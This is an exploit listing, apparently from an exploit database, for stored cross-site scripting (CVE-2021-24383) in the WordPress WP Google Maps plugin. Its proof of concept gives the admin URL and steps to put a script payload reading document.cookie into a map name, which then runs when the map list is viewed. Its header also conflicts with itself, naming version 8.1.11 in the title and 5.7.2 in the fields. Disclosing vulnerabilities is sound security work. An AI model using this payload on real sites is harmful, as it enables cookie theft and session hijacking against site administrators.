Exploit for WordPress WP Google Maps 8.1.11 Cross Site Scripting CVE-2021-24383

Name: Exploit for WordPress WP Google Maps 8.1.11 Cross Site Scripting CVE-2021-24383
Rating: 5 (104 reviews)

2021-06-23 | CVSS 0.2

## https://sploitus.com/exploit?id=PACKETSTORM:163261
# Exploit Title: WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS)  
# Date: 22/6/2021  
# Exploit Author: Mohammed Adam  
# Vendor Homepage: https://www.wpgmaps.com/  
# Software Link: https://wordpress.org/plugins/wp-google-maps/  
# Version: 5.7.2  
# Tested on: Windows 10  
# CVE: CVE-2021-24383  
# References link: https://wpscan.com/vulnerability/1270588c-53fe-447e-b83c-1b877dc7a954  
  
*Proof of Concept*  
  
*Steps to Reproduce:*  
  
1) Edit a map (e.g  
/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1)  
  
2) Change Map Name to <script>alert(document.cookie)</script>  
  
3) Save the Map  
  
4) Stored XSS will be triggered when viewing the Map List  
(/wp-admin/admin.php?page=wp-google-maps-menu)